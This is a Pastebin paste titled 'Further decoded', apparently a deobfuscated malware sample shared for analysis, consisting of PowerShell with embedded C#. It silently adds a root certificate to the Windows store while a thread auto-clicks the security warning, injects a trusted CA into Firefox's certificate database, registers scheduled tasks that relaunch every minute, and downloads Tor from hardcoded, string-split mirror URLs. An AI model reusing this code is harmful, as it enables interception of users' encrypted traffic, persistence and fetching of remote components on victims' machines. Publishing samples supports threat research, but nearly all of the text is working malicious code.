API tools faq
paste
James_inthe_box

Further decoded

James_inthe_box
Dec 11th, 2018
396
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.45 KB | None | 0 0
raw download clone embed print report
  1. function IxwlznPssNNPP{
  2. Add-Type @"
  3. using System;
  4. using System.Text;
  5. using System.Runtime.InteropServices;
  6. using System.Diagnostics;
  7. using System.Security.Cryptography.X509Certificates;
  8. using System.Threading;
  9.  
  10. public static class uDWozt
  11. {
  12. public class brNXwO
  13. {
  14. public string Wndclass;
  15. public string Title;
  16. public string Process;
  17. public IntPtr hWnd;
  18. }
  19.  
  20. private delegate bool KIzxk(IntPtr hWnd, ref brNXwO data);
  21.  
  22. [DllImport("user32.dll")]
  23. [return: MarshalAs(UnmanagedType.Bool)]
  24. private static extern bool EnumWindows(KIzxk lpEnumFunc, ref brNXwO data);
  25.  
  26. [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
  27. public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);
  28.  
  29. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  30. public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
  31.  
  32. [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
  33. static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
  34.  
  35. [DllImport("user32.dll")]
  36. [return: MarshalAs(UnmanagedType.Bool)]
  37. static extern bool SetForegroundWindow(IntPtr hWnd);
  38.  
  39. public delegate bool uDP(IntPtr hwnd, IntPtr lParam);
  40.  
  41. [DllImport("user32")]
  42. [return: MarshalAs(UnmanagedType.Bool)]
  43. public static extern bool EnumChildWindows(IntPtr window, uDP callback, IntPtr lParam);
  44.  
  45. [DllImport("user32.dll", CharSet = CharSet.Auto)]
  46. static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam);
  47.  
  48. [Flags]
  49. private enum SnapshotFlags : uint
  50. {
  51. HeapList = 0x00000001,
  52. Process = 0x00000002,
  53. Thread = 0x00000004,
  54. Module = 0x00000008,
  55. Module32 = 0x00000010,
  56. Inherit = 0x80000000,
  57. All = 0x0000001F,
  58. NoHeaps = 0x40000000
  59. }
  60. //inner struct used only internally
  61. [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
  62. private struct PROCESSENTRY32
  63. {
  64. const int MAX_PATH = 260;
  65. internal UInt32 dwSize;
  66. internal UInt32 cntUsage;
  67. internal UInt32 th32ProcessID;
  68. internal IntPtr th32DefaultHeapID;
  69. internal UInt32 th32ModuleID;
  70. internal UInt32 cntThreads;
  71. internal UInt32 th32ParentProcessID;
  72. internal Int32 pcPriClassBase;
  73. internal UInt32 dwFlags;
  74. [MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)]
  75. internal string szExeFile;
  76. }
  77.  
  78. [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
  79. static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID);
  80.  
  81. [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
  82. static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);
  83.  
  84. [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
  85. static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);
  86.  
  87. [DllImport("kernel32", SetLastError = true)]
  88. [return: MarshalAs(UnmanagedType.Bool)]
  89. private static extern bool CloseHandle([In] IntPtr hObject);
  90.  
  91. const int BM_CL = 0x00F5;
  92.  
  93. public static byte[] lIxrqOO(String sCert)
  94. {
  95. return Convert.FromBase64String(sCert);
  96. }
  97.  
  98. public static void MdZnUIVph(String sCert){
  99. System.Console.WriteLine("[Win32]::Start()");
  100. byte[] bCert = lIxrqOO(sCert);
  101. if (bCert != null)
  102. {
  103. X509Certificate2 certificate = new X509Certificate2(bCert);
  104. X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser);
  105. store.Open(OpenFlags.ReadWrite);
  106. if (!store.Certificates.Contains(certificate))
  107. {
  108. Thread thread = new Thread(jinJTAGRFjJN);
  109. thread.Start();
  110. store.Add(certificate);
  111. thread.Join();
  112. }
  113. store.Close();
  114. }
  115. }
  116.  
  117. public static void jinJTAGRFjJN()
  118. {
  119. System.Console.WriteLine("[Win32]::SearchDialog()");
  120. IntPtr hWnd;
  121. do{
  122. hWnd = UANP("#32770",String.Empty);
  123. if (!hWnd.Equals(IntPtr.Zero))
  124. {
  125. System.Console.WriteLine("Founded hWnd=0x{0:X}",hWnd);
  126. break;
  127. }else
  128. {
  129. hWnd=IntPtr.Zero;
  130. System.Console.WriteLine("Try again find window");
  131. }
  132. }while (hWnd.Equals(IntPtr.Zero));
  133. System.Console.WriteLine("Dialog window founded");
  134. SetForegroundWindow(hWnd);
  135. uDP childProc = new uDP(Sqvkzka);
  136. EnumChildWindows(hWnd, childProc, IntPtr.Zero);
  137. }
  138.  
  139. public static IntPtr UANP(string wndclass, string title)
  140. {
  141. brNXwO sd = new brNXwO();
  142. sd.Wndclass = wndclass;
  143. sd.Title = title;
  144. sd.hWnd=IntPtr.Zero;
  145. System.Console.WriteLine("EnumWindow -|");
  146. EnumWindows(new KIzxk(QfEgqbiwLLE), ref sd);
  147. return sd.hWnd;
  148. }
  149.  
  150. public static bool QfEgqbiwLLE(IntPtr hWnd, ref brNXwO data)
  151. {
  152. StringBuilder title = new StringBuilder(1024);
  153. StringBuilder className = new StringBuilder(1024);
  154. GetWindowText(hWnd, title, title.Capacity);
  155. GetClassName(hWnd, className, className.Capacity);
  156. String sEN=zlZtvaJq(hWnd).ToLower();
  157. if((!data.Wndclass.Equals(String.Empty) && className.ToString().StartsWith(data.Wndclass)) || (!data.Title.Equals(String.Empty) && title.ToString().StartsWith(data.Title)))
  158. {
  159. System.Console.WriteLine(" |- hWnd=0x{0:X}; Class={1}; Title={2}; Process={3}",hWnd,className.ToString(),title.ToString(),sEN);
  160. if(sEN.Contains("csrss") || sEN.Contains("certutil") || sEN.Contains("powershell"))
  161. {
  162. data.hWnd = hWnd;
  163. return false;
  164. }
  165. }
  166.  
  167. return true;
  168. }
  169.  
  170. public static String zlZtvaJq(IntPtr cQzoivDyDVP){
  171. uint LSMhtexN = 0;
  172. uint threadID = GetWindowThreadProcessId(cQzoivDyDVP, out LSMhtexN);
  173. String sProc = null;
  174. IntPtr handleToSnapshot = IntPtr.Zero;
  175. try
  176. {
  177. PROCESSENTRY32 uRgD = new PROCESSENTRY32();
  178. uRgD.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32));
  179. handleToSnapshot = CreateToolhelp32Snapshot((uint)SnapshotFlags.Process, 0);
  180. if (Process32First(handleToSnapshot, ref uRgD))
  181. {
  182. do
  183. {
  184. if (LSMhtexN == uRgD.th32ProcessID)
  185. {
  186. sProc = uRgD.szExeFile;
  187. break;
  188. }
  189. } while (Process32Next(handleToSnapshot, ref uRgD));
  190. }
  191. else
  192. {
  193. throw new ApplicationException(string.Format("Failed with win32 error code {0}", Marshal.GetLastWin32Error()));
  194. }
  195. }
  196. catch (Exception ex)
  197. {
  198. throw new ApplicationException("Can't get the process.", ex);
  199. }
  200. finally
  201. {
  202. CloseHandle(handleToSnapshot);
  203. }
  204. return sProc;
  205. }
  206. public static bool Sqvkzka(IntPtr hWnd, IntPtr lParam)
  207. {
  208. SendMessage(hWnd, BM_CL, IntPtr.Zero, IntPtr.Zero);
  209. return true;
  210. }
  211. }
  212. "@;
  213. [uDWozt]::MdZnUIVph("%CERT%");
  214. exit
  215. }
  216. IxwlznPssNNPP
  217.  
  218. function qWydooxsfcuX{
  219. Add-Type @"
  220. using System;
  221. using System.IO;
  222. using Microsoft.Win32;
  223. using System.Runtime.InteropServices;
  224. using System.ComponentModel;
  225.  
  226. public sealed class VvvluVYvCVHZcKJ
  227. {
  228. private static volatile VvvluVYvCVHZcKJ bWQOycQsqwujTX;
  229. private static object FjuSmxcUz = new Object();
  230. public static VvvluVYvCVHZcKJ yXpWzzNyofAXFw()
  231. {
  232. if (bWQOycQsqwujTX == null)
  233. {
  234. lock (FjuSmxcUz)
  235. {
  236. if (bWQOycQsqwujTX == null)
  237. bWQOycQsqwujTX = new VvvluVYvCVHZcKJ();
  238. }
  239. }
  240. return bWQOycQsqwujTX;
  241. }
  242.  
  243. const int GlPtNsgUc=0;
  244.  
  245. [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
  246. static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
  247.  
  248. private static IntPtr sVoGpYpL(string libPath)
  249. {
  250. if (String.IsNullOrEmpty(libPath))
  251. throw new ArgumentNullException("libPath");
  252.  
  253. IntPtr moduleHandle = LoadLibrary(libPath);
  254. if (moduleHandle == IntPtr.Zero)
  255. {
  256. int lasterror = Marshal.GetLastWin32Error();
  257. System.Console.WriteLine(String.Format("Last error: 0x{0:X}",lasterror));
  258. Win32Exception innerEx = new Win32Exception(lasterror);
  259. innerEx.Data.Add("LastWin32Error", lasterror);
  260. throw new Exception("can't load DLL " + libPath, innerEx);
  261. }
  262. return moduleHandle;
  263. }
  264.  
  265. [DllImport("kernel32.dll")]
  266. public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
  267. //Constants
  268. const uint NSS_INIT_READONLY=0x1;
  269. const uint NSS_INIT_NOCERTDB = 0x2;
  270. const uint NSS_INIT_NOMODDB = 0x4;
  271. const uint NSS_INIT_FORCEOPEN = 0x8;
  272. const uint NSS_INIT_NOROOTINIT = 0x10;
  273. const uint NSS_INIT_OPTIMIZESPACE = 0x20;
  274. const uint NSS_INIT_PK11THREADSAFE = 0x40;
  275. const uint NSS_INIT_PK11RELOAD = 0x80;
  276. const uint NSS_INIT_NOPK11FINALIZE = 0x100;
  277. const uint NSS_INIT_RESERVED = 0x200;
  278. const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_INIT_PK11RELOAD | NSS_INIT_NOPK11FINALIZE | NSS_INIT_RESERVED;
  279.  
  280. const string SECMOD_DB = "secmod.db";
  281. //Structures
  282. [StructLayout(LayoutKind.Sequential)]
  283. public struct SECItem
  284. {
  285. public uint iType;
  286. public IntPtr bData;
  287. public uint iDataLen;
  288. }
  289.  
  290. [StructLayout(LayoutKind.Sequential)]
  291. private struct CertTrusts
  292. {
  293. public int iSite;
  294. public int iEmail;
  295. public int iSoft;
  296. }
  297.  
  298. private enum SECCertUsage
  299. {
  300. certUsageSSLClient = 0,
  301. certUsageSSLServer = 1,
  302. certUsageSSLServerWithStepUp = 2,
  303. certUsageSSLCA = 3,
  304. certUsageEmailSigner = 4,
  305. certUsageEmailRecipient = 5,
  306. certUsageObjectSigner = 6,
  307. certUsageUserCertImport = 7,
  308. certUsageVerifyCA = 8,
  309. certUsageProtectedObjectSigner = 9,
  310. certUsageStatusResponder = 10,
  311. certUsageAnyCA = 11
  312. }
  313. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  314. private delegate int SAHQOjSKIQuqauu(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags);
  315.  
  316. private int jMqvNrdsjLvv(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags)
  317. {
  318. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "NSS_Initialize");
  319. SAHQOjSKIQuqauu ptr = (SAHQOjSKIQuqauu)Marshal.GetDelegateForFunctionPointer(pProc, typeof(SAHQOjSKIQuqauu));
  320. return ptr(sConfigDir, certPrefix, keyPrefix, secModName, flags);
  321. }
  322.  
  323. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  324. private delegate IntPtr NIYpPCjCBxFfBC();
  325. private IntPtr CNdGzRYooz()
  326. {
  327. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_GetDefaultCertDB");
  328. NIYpPCjCBxFfBC ptr = (NIYpPCjCBxFfBC)Marshal.GetDelegateForFunctionPointer(pProc, typeof(NIYpPCjCBxFfBC));
  329. return ptr();
  330. }
  331.  
  332. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  333. private delegate IntPtr sTBBLA();
  334. private IntPtr jYJvrdt()
  335. {
  336. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "NSS_Shutdown");
  337. sTBBLA ptr = (sTBBLA)Marshal.GetDelegateForFunctionPointer(pProc, typeof(sTBBLA));
  338. return ptr();
  339. }
  340.  
  341. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  342. private delegate int mxfz(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname);
  343. private int zAkHNfkzyckVBxn(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname)
  344. {
  345. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_ImportCerts");
  346. mxfz ptr = (mxfz)Marshal.GetDelegateForFunctionPointer(pProc, typeof(mxfz));
  347. return ptr(certdb, usage, ncerts, ref derCerts, ref retCerts, keepCerts, caOnly, nickname);
  348. }
  349.  
  350. private delegate int UJdXr(IntPtr certdb, IntPtr cert, ref CertTrusts trust);
  351. private int rJbhRgnUdJYH(IntPtr certdb, IntPtr cert, ref CertTrusts trust)
  352. {
  353. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_ChangeCertTrust");
  354. UJdXr ptr = (UJdXr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(UJdXr));
  355. return ptr(certdb, cert, ref trust);
  356. }
  357.  
  358. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  359. public delegate int BxDVnEb(IntPtr cert, uint ncerts);
  360. private int GMMnJgiwqS(IntPtr cert, uint ncerts)
  361. {
  362. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_DestroyCertArray");
  363. BxDVnEb ptr = (BxDVnEb)Marshal.GetDelegateForFunctionPointer(pProc, typeof(BxDVnEb));
  364. return ptr(cert, ncerts);
  365. }
  366.  
  367. private IntPtr xHkdzDjqqFO = IntPtr.Zero;
  368.  
  369. public Boolean yXKVDNlNplVzraF(String sCert){
  370. System.Console.WriteLine(String.Format("VvvluVYvCVHZcKJ Start. Process {0}-bit",IntPtr.Size * 8));
  371. String sProfile = GetProfile();
  372. if (String.IsNullOrEmpty(sProfile))
  373. {
  374. System.Console.WriteLine("Profile not found");
  375. return false;
  376. }
  377. System.Console.WriteLine("Profile path="+sProfile);
  378. byte[] bCert = GetCertAsByteArray(sCert);
  379. IntPtr ipCert = Marshal.AllocHGlobal(bCert.Length);
  380. System.Console.WriteLine("Unpack cert OK");
  381. try
  382. {
  383. DirectoryInfo diInstallPath = GetIP();
  384. if (diInstallPath == null)
  385. {
  386. System.Console.WriteLine("diInstallPath is null");
  387. String ffexe = @"C:\Program Files\Mozilla Firefox\firefox.exe";
  388. if (File.Exists(ffexe))
  389. {
  390. diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe));
  391. System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe));
  392. }
  393. else
  394. {
  395. ffexe = @"C:\Program Files (x86)\Mozilla Firefox\firefox.exe";
  396. if (File.Exists(ffexe))
  397. {
  398. diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe));
  399. System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe));
  400. }
  401. }
  402. }
  403. String sCurrentDirectory = Directory.GetCurrentDirectory();
  404. Directory.SetCurrentDirectory(diInstallPath.FullName);
  405. System.Console.WriteLine("Install path="+diInstallPath.FullName);
  406. foreach(FileInfo fiDll in diInstallPath.GetFiles("*.dll"))
  407. {
  408. if (fiDll.Name.Equals("breakpadinjector.dll")) continue;
  409. try{
  410. sVoGpYpL(fiDll.FullName);
  411. }catch (Exception ex){
  412. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  413. }
  414. }
  415. xHkdzDjqqFO = sVoGpYpL(diInstallPath.FullName + "\\nss3.dll");
  416. if (xHkdzDjqqFO.Equals(IntPtr.Zero))
  417. {
  418. System.Console.WriteLine("Firefox install directory not found");
  419. return false;
  420. }
  421. System.Console.WriteLine("Init dlls OK");
  422. Directory.SetCurrentDirectory(sCurrentDirectory);
  423. //Init cert
  424. Marshal.Copy(bCert, 0, ipCert, bCert.Length);
  425. SECItem CertItem = new SECItem();
  426. CertItem.iType = 3;
  427. CertItem.bData = ipCert;
  428. CertItem.iDataLen = (uint)bCert.Length;
  429. SECItem[] aCertItem = new SECItem[1];
  430. aCertItem[0] = CertItem;
  431.  
  432. CertTrusts CertTrust = new CertTrusts();
  433. CertTrust.iSite = 0x10;
  434. CertTrust.iEmail = 0x10;
  435. CertTrust.iSoft = 0x10;
  436. System.Console.WriteLine("Init cert OK");
  437. //End init cert
  438. int status = jMqvNrdsjLvv("sql:"+sProfile, "", "", SECMOD_DB, NSS_INIT_OPTIMIZESPACE);
  439. if (status != GlPtNsgUc)
  440. {
  441. System.Console.WriteLine(String.Format("NSS_InitReadWrite ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
  442. return false;
  443. }
  444. IntPtr bd = CNdGzRYooz();
  445. if (bd == IntPtr.Zero)
  446. {
  447. System.Console.WriteLine("CERT_GetDefaultCertDB Failed");
  448. jYJvrdt();
  449. return false;
  450. }
  451. System.Console.WriteLine("CERT_GetDefaultCertDB OK");
  452. IntPtr CertToImport = new IntPtr();
  453. IntPtr[] aCertToImport = new IntPtr[1];
  454. status = zAkHNfkzyckVBxn(bd, 11, 1, ref aCertItem, ref CertToImport, 1, 0, IntPtr.Zero);
  455. if (status != GlPtNsgUc)
  456. {
  457. System.Console.WriteLine(String.Format("CERT_ImportCerts ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
  458. jYJvrdt();
  459. return false;
  460. }
  461. System.Console.WriteLine("CERT_ImportCerts OK");
  462. Marshal.Copy(CertToImport, aCertToImport, 0, 1);
  463. status = rJbhRgnUdJYH(bd, aCertToImport[0], ref CertTrust);
  464. if ( status != GlPtNsgUc)
  465. {
  466. System.Console.WriteLine(String.Format("CERT_ChangeCertTrust ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
  467. jYJvrdt();
  468. return false;
  469. };
  470. System.Console.WriteLine("CERT_ChangeCertTrust OK");
  471. GMMnJgiwqS(CertToImport, 1);
  472. System.Console.WriteLine("Add cert OK");
  473. }
  474. catch (Exception ex){
  475. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  476. }
  477. finally
  478. {
  479. jYJvrdt();
  480. }
  481. return true;
  482. }
  483. private String GetProfile()
  484. {
  485. String FFProfile = Path.Combine(Environment.GetEnvironmentVariable("APPDATA"), @"Mozilla\Firefox\Profiles");
  486. if (Directory.Exists(FFProfile))
  487. {
  488. if (Directory.GetDirectories(FFProfile, "*.default").Length > 0)
  489. {
  490. return Directory.GetDirectories(FFProfile, "*.default")[0];
  491. }
  492. }
  493. return "";
  494. }
  495. public byte[] GetCertAsByteArray(String sCert)
  496. {
  497. try
  498. {
  499. return Convert.FromBase64String(sCert);
  500. }
  501. catch (Exception ex){
  502. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  503. }
  504. return null;
  505. }
  506. private DirectoryInfo GetIP()
  507. {
  508. DirectoryInfo fp = null;
  509. // get firefox path from registry
  510. // we'll search the 32bit install location
  511. RegistryKey localMachine1 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Mozilla\Mozilla Firefox", false);
  512. // and lets try the 64bit install location just in case
  513. RegistryKey localMachine2 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox", false);
  514.  
  515. if (localMachine1 != null)
  516. {
  517. try
  518. {
  519. string[] installedVersions = localMachine1.GetSubKeyNames();
  520. // we'll take the first installed version, people normally only have one
  521. if (installedVersions.Length == 0)
  522. throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
  523.  
  524. RegistryKey mainInstall = localMachine1.OpenSubKey(installedVersions[0]);
  525.  
  526. // get install directory
  527. string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);
  528.  
  529. if (installString == null)
  530. throw new NullReferenceException("Install string was null");
  531.  
  532. fp = new DirectoryInfo(installString);
  533. }
  534. catch (Exception ex)
  535. {
  536. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  537. }
  538. }
  539. else if (localMachine2 != null)
  540. {
  541. try
  542. {
  543. string[] installedVersions = localMachine2.GetSubKeyNames();
  544. // we'll take the first installed version, people normally only have one
  545. if (installedVersions.Length == 0)
  546. throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
  547.  
  548. RegistryKey mainInstall = localMachine2.OpenSubKey(installedVersions[0]);
  549.  
  550. // get install directory
  551. string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);
  552.  
  553. if (installString == null)
  554. throw new NullReferenceException("Install string was null");
  555. fp = new DirectoryInfo(installString);
  556. }
  557. catch (Exception ex)
  558. {
  559. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  560. }
  561. }else{
  562. System.Console.WriteLine("Registry records not found");
  563. }
  564. return fp;
  565. }
  566. }
  567. "@;
  568. [VvvluVYvCVHZcKJ]::yXpWzzNyofAXFw().yXKVDNlNplVzraF("%CERT%");
  569. }
  570. qWydooxsfcuX
  571.  
  572.  
  573. $SH_TYPE_SCHEDULED_TASK=1;
  574. $SH_TYPE_TASK_SCHEDULER=2;
  575. $schedulerType=$SH_TYPE_SCHEDULED_TASK;
  576. function mWwT
  577. {
  578. param([string]$zipfile, [string]$destination);
  579. $7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
  580. if (-NOT (Test-Path $7z)){
  581. Try
  582. {
  583. (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
  584. }
  585. Catch{}
  586. }
  587. if ($(Try { Test-Path $7z.trim() } Catch { $false })){
  588. Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
  589. }
  590. else{
  591. $shell = new-object -com shell.application;
  592. $zip = $shell.NameSpace($zipfile);
  593. foreach($item in $zip.items())
  594. {
  595. $shell.Namespace($destination).copyhere($item);
  596. }
  597. }
  598. }
  599.  
  600. function Add-Shortcut{
  601. param([string]$target_path, [string]$dest_path, [string]$work_path, [string]$arguments="");
  602.  
  603. $_path=Split-Path $dest_path;
  604. if (-Not (Test-Path $_path)){
  605. mkdir -Force $_path;
  606. }
  607. if (-Not (Test-Path $target_path)){
  608. Write-Output "Can't add shortcut. Target path '$target_path' not found.";
  609. return;
  610. }
  611. if ((Test-Path $dest_path)){
  612. Write-Output "Can't add shortcut. Destination path '$dest_path' exist.";
  613. return;
  614. }
  615.  
  616. $_shell = New-Object -ComObject ("WScript.Shell");
  617. $_shortcut = $_shell.CreateShortcut($dest_path);
  618. $_shortcut.TargetPath=$target_path;
  619. if(-Not [String]::IsNullOrEmpty($arguments)){
  620. $_shortcut.Arguments=$arguments;
  621. }
  622. $_shortcut.WorkingDirectory=$work_path;
  623. $_shortcut.Save();
  624. }
  625.  
  626. function Base64ToFile
  627. {
  628. param([string]$file, [string]$string);
  629. $bytes=[System.Convert]::FromBase64String($string);
  630. #set-content -encoding byte $file -value $bytes;
  631. [IO.File]::WriteAllBytes($file, $bytes);
  632. }
  633. function RandomString{
  634. param([int]$min=5, [int]$max=15);
  635. return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
  636. }
  637. function InitScheduller{
  638. try{
  639. Import-Module ScheduledTasks -ErrorAction Stop;
  640. return $SH_TYPE_SCHEDULED_TASK;
  641. }catch{
  642. $File=$env:Temp+'\'+(RandomString)+'.zip';
  643. $Dest=$env:Temp+'\'+(RandomString);
  644. while (!(nne 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
  645. if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
  646. mWwT $File $Dest;
  647. Remove-Item -Force $File;
  648. $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll';
  649. $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
  650. return $SH_TYPE_TASK_SCHEDULER;
  651. }
  652. }
  653. function FqCZvVAFIWkCT
  654. {
  655. param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
  656. switch ($schedulerType) {
  657. $SH_TYPE_SCHEDULED_TASK {
  658. $Action = New-ScheduledTaskAction -Execute $cmd;
  659. if(-Not [String]::IsNullOrEmpty($params)){
  660. $Action.Arguments=$params;
  661. }
  662. if(-Not [String]::IsNullOrEmpty($dir)){
  663. $Action.WorkingDirectory=$dir;
  664. }
  665. $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn;
  666. try{
  667. $LogonTrigger.UserId=$env:username;
  668. }catch{
  669. $LogonTrigger.User=$env:username;
  670. }
  671. if(-Not $delay -eq 0){
  672. $LogonTrigger.Delay=New-TimeSpan -Seconds $delay;
  673. }
  674. if($restart -eq 1){
  675. $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20));
  676. }
  677. $Settings = New-ScheduledTaskSettingsSet;
  678. $Settings.DisallowStartIfOnBatteries = $False;
  679. $Settings.StopIfGoingOnBatteries = $False;
  680. if($restart -eq 1){
  681. $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString);
  682. }else{
  683. $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString);
  684. }
  685. Start-ScheduledTask -InputObject $Task;
  686. };
  687. Default {
  688. $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
  689. $td=$ts.NewTask();
  690. $td.RegistrationInfo.Description = (RandomString);
  691. $td.Settings.DisallowStartIfOnBatteries = $False;
  692. $td.Settings.StopIfGoingOnBatteries = $False;
  693. $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
  694. $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
  695. $LogonTrigger.StartBoundary=[System.DateTime]::Now;
  696. $LogonTrigger.UserId=$env:username;
  697. $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
  698. $td.Triggers.Add($LogonTrigger);
  699. if($restart -eq 1){
  700. $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
  701. $TimeTrigger.StartBoundary=[System.DateTime]::Now;
  702. $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1);
  703. $TimeTrigger.Repetition.StopAtDurationEnd=$False;
  704. $td.Triggers.Add($TimeTrigger);
  705. }
  706. $tsf="Microsoft.Win32.TaskScheduler";
  707. $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir);
  708. $td.Actions.Add($ExecAction);
  709. $task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
  710. $task.Run();
  711. };
  712. }
  713. }
  714. function nne {
  715. param([string]$nhhrQGEpp, [string]$KZqZalXQzaGMBW);
  716. $ErrorActionPreference = "Stop";
  717. Write-Host ("Download {0} to {1}" -f ($nhhrQGEpp, $KZqZalXQzaGMBW));
  718. try{
  719. [Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls, ssl3";
  720. }catch{}
  721. try {
  722. Start-BitsTransfer -Source $nhhrQGEpp -Destination $KZqZalXQzaGMBW;
  723. }
  724. catch {
  725. #Write-Error $_ -ErrorAction Continue;
  726. try {
  727. (New-Object System.Net.WebClient).DownloadFile($nhhrQGEpp,$KZqZalXQzaGMBW);
  728. }
  729. catch {
  730. #Write-Error $_ -ErrorAction Continue;
  731. Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$nhhrQGEpp`" `"$KZqZalXQzaGMBW`"" -Wait -WindowStyle Hidden;
  732. }
  733. }finally{
  734. $ErrorActionPreference = "Continue";
  735. }
  736. if ( $(Try { Test-Path $KZqZalXQzaGMBW.trim() } Catch { $false })){
  737. return $true;
  738. }
  739. return $false;
  740. }
  741. function ZjLBbVj{
  742. $schedulerType = InitScheduller;
  743. $tf=$env:Temp+'\'+(RandomString)+'.zip';
  744. $gLRlOZOsud=$env:ALLUSERSPROFILE+'\'+(RandomString);
  745. $yXozjITRBzpQM=@([string]::Concat('https://di','st.t','orproject.org/'), [string]::Concat("https://mirror.oldsql.cc/t","or/di","st/"), [string]::Concat("https://to","rmirror.tb-itf-t","or.de/di","st/"));
  746. foreach ($pKUDFhhhvNZv in $yXozjITRBzpQM) {
  747. $maV=$pKUDFhhhvNZv+"torbrowser/8.0.3/t"+"or-win32-0.3.4.8.zip";
  748. if((nne $maV $tf)){
  749. break;
  750. }
  751. }
